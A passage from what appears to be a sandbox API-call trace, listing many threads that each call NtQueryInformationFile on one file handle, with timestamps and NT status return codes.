FileInformationClass=0x9 | out: IoStatusBlock=0x478f900, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1376 os_tid = 0x2dc [0153.833] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fab8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fab8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1377 os_tid = 0x74c [0153.835] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fe88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fe88, FileInformation=0x44d8098) returned 0x0 Thread: id = 1378 os_tid = 0x3c4 [0153.836] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436feb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436feb0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1379 os_tid = 0x90 [0153.841] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fe60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fe60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1380 os_tid = 0x630 [0153.843] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fca0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1381 os_tid = 0x124 [0153.846] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef8d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef8d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1382 os_tid = 0xc0 [0153.847] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df9d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df9d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1383 os_tid = 0x360 [0153.849] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f9b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f9b8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1384 os_tid = 0x920 [0153.851] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f928, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f928, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1385 os_tid = 0xbec [0153.853] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df7c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df7c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1386 os_tid = 0x6b8 [0153.854] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fcd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fcd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1387 os_tid = 0x30c [0153.859] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fb10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fb10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1388 os_tid = 0xbfc [0153.861] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fdb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fdb0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1389 os_tid = 0x3f8 [0153.864] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fee8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fee8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1390 os_tid = 0x6cc [0153.866] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fe50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fe50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1391 os_tid = 0x830 [0153.867] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef820, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef820, FileInformation=0x44d8098) returned 0x0 Thread: id = 1392 os_tid = 0x75c [0153.869] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff920, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff920, FileInformation=0x44d8098) returned 0x0 Thread: id = 1393 os_tid = 0x7f0 [0153.870] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477faf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477faf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1394 os_tid = 0x710 [0153.872] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f9d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f9d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1395 os_tid = 0x5d8 [0153.873] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfaf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfaf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1396 os_tid = 0xbe4 [0153.875] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fdb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fdb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1397 os_tid = 0x600 [0153.877] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fbd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fbd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1398 os_tid = 0xbd0 [0153.878] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fd18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fd18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1399 os_tid = 0x158 [0153.880] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fbf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fbf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1400 os_tid = 0xbd8 [0153.882] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efbd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efbd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1401 os_tid = 0xbe8 [0153.885] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494faf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494faf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1402 os_tid = 0xbdc [0153.886] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434ff30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434ff30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1403 os_tid = 0x5b4 [0153.888] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f900, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f900, FileInformation=0x44d8098) returned 0x0 Thread: id = 1404 os_tid = 0x614 [0153.889] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fd08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fd08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1405 os_tid = 0x690 [0153.891] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47eff08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47eff08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1406 os_tid = 0xa68 [0153.893] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f828, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f828, FileInformation=0x44d8098) returned 0x0 Thread: id = 1407 os_tid = 0x7d0 [0153.895] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efac8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efac8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1408 os_tid = 0x7d8 [0153.897] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efbf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efbf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1409 os_tid = 0x24c [0153.899] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fae0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fae0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1410 os_tid = 0x9f8 [0153.900] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x435fd40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x435fd40, FileInformation=0x44d8098) returned 0x0 Thread: id = 1411 os_tid = 0x798 [0153.902] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476f9a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476f9a0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1412 os_tid = 0xa3c [0153.903] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fbc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fbc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1413 os_tid = 0x8c0 [0153.905] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fee0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fee0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1414 os_tid = 0x708 [0153.906] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fdd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fdd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1415 os_tid = 0xa64 [0153.908] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efbf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efbf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1416 os_tid = 0xa30 [0153.910] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47af848, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47af848, FileInformation=0x44d8098) returned 0x0 Thread: id = 1417 os_tid = 0x388 [0153.911] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fa60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fa60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1418 os_tid = 0x760 [0153.913] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf8c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf8c8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1419 os_tid = 0xa54 [0153.914] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f968, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f968, FileInformation=0x44d8098) returned 0x0 Thread: id = 1420 os_tid = 0x738 [0153.916] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48af9a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48af9a0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1421 os_tid = 0x488 [0153.918] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf858, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf858, FileInformation=0x44d8098) returned 0x0 Thread: id = 1422 os_tid = 0x6dc [0153.920] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efd00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efd00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1423 os_tid = 0x7a0 [0153.921] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fb90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fb90, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1424 os_tid = 0x73c [0153.923] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef7a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef7a8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1425 os_tid = 0x1c0 [0153.925] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afd48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afd48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1426 os_tid = 0x7c4 [0153.926] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfce0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfce0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1427 os_tid = 0x790 [0153.928] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492f850, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492f850, FileInformation=0x44d8098) returned 0x0 Thread: id = 1428 os_tid = 0x688 [0153.930] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47fff50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47fff50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1429 os_tid = 0x240 [0153.932] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fc88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fc88, FileInformation=0x44d8098) returned 0x0 Thread: id = 1430 os_tid = 0x8e0 [0153.934] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cf9b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cf9b0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1431 os_tid = 0x880 [0153.937] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f988, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f988, FileInformation=0x44d8098) returned 0x0 Thread: id = 1432 os_tid = 0x8f0 [0153.938] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f798, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f798, FileInformation=0x44d8098) returned 0x0 Thread: id = 1433 os_tid = 0xa18 [0153.940] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfa88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfa88, FileInformation=0x44d8098) returned 0x0 Thread: id = 1434 os_tid = 0x8a0 [0153.941] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f978, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f978, FileInformation=0x44d8098) returned 0x0 Thread: id = 1435 os_tid = 0x870 [0153.943] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488ff60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488ff60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1436 os_tid = 0x9a0 [0153.945] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f818, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f818, FileInformation=0x44d8098) returned 0x0 Thread: id = 1437 os_tid = 0x2c4 [0153.946] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efa80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efa80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1438 os_tid = 0x890 [0153.948] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afcc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afcc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1439 os_tid = 0x4e8 [0153.949] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fc10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fc10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1440 os_tid = 0xcc [0153.951] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1441 os_tid = 0xd0 [0153.953] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430ff58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430ff58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1442 os_tid = 0xd4 [0153.955] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fd70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fd70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1443 os_tid = 0xd8 [0153.957] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fca0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1444 os_tid = 0xdc [0153.959] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f8e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f8e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1445 os_tid = 0xe0 [0153.960] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f850, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f850, FileInformation=0x44d8098) returned 0x0 Thread: id = 1446 os_tid = 0xe4 [0153.962] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fb50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fb50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1447 os_tid = 0xe8 [0153.964] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffed0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffed0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1448 os_tid = 0xec [0153.966] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484ff18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484ff18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1449 os_tid = 0x748 [0153.968] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f7c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f7c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1450 os_tid = 0xc4 [0153.969] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fbe0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fbe0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1451 os_tid = 0x620 [0153.979] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fe88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fe88, FileInformation=0x44d8098) returned 0x0 Thread: id = 1452 os_tid = 0x910 [0153.981] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fa68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fa68, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1453 os_tid = 0x950 [0153.983] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfd30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfd30, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1454 os_tid = 0x940 [0153.984] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fe48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fe48, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1455 os_tid = 0x980 [0153.986] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fc90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fc90, FileInformation=0x44d8098) returned 0x0 Thread: id = 1456 os_tid = 0xa10 [0153.988] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fa40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fa40, FileInformation=0x44d8098) returned 0x0 Thread: id = 1457 os_tid = 0x72c [0153.990] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fe40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fe40, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1458 os_tid = 0x9e0 [0153.991] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484f8f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484f8f0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1459 os_tid = 0x9c4 [0153.993] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fe70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fe70, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1460 os_tid = 0xa6c [0153.995] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fcd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fcd8, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1461 os_tid = 0xb00 [0153.997] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fb58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fb58, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1462 os_tid = 0xaf8 [0153.999] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfed8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfed8, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1463 os_tid = 0xae4 [0154.000] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fd70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fd70, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1464 os_tid = 0x344 [0154.002] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfd58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfd58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1465 os_tid = 0x808 [0154.004] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f9c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f9c8, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1466 os_tid = 0x858 [0154.005] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efdf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efdf0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1467 os_tid = 0x224 [0154.007] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfea8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfea8, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1468 os_tid = 0x4dc [0154.008] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fd60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fd60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1469 os_tid = 0x78c [0154.010] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fa38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fa38, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1470 os_tid = 0xb0 [0154.012] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf790, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf790, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1471 os_tid = 0x314 [0154.020] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef940, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef940, FileInformation=0x44d8098) returned 0x0 Thread: id = 1472 os_tid = 0x804 [0154.022] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fbc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fbc0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1473 os_tid = 0x854 [0154.023] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f920, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f920, FileInformation=0x44d8098) returned 0x0 Thread: id = 1474 os_tid = 0xa78 [0154.025] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478feb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478feb0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1475 os_tid = 0x7a8 [0154.026] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478faf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478faf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1476 os_tid = 0x330 [0154.028] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfd00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfd00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1477 os_tid = 0x3a4 [0154.030] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fa90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fa90, FileInformation=0x44d8098) returned 0x0 Thread: id = 1478 os_tid = 0x67c [0154.033] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fc40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fc40, FileInformation=0x44d8098) returned 0x0 Thread: id = 1479 os_tid = 0x5cc [0154.034] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47eff38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47eff38, FileInformation=0x44d8098) returned 0x0 Thread: id = 1480 os_tid = 0x840 [0154.036] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf848, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf848, FileInformation=0x44d8098) returned 0x0 Thread: id = 1481 os_tid = 0x69c [0154.037] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f958, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f958, FileInformation=0x44d8098) returned 0x0 Thread: id = 1482 os_tid = 0x6f0 [0154.039] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483ff20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483ff20, FileInformation=0x44d8098) returned 0x0 Thread: id = 1483 os_tid = 0x810 [0154.041] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efa68, FileInformation=0x44d8098, 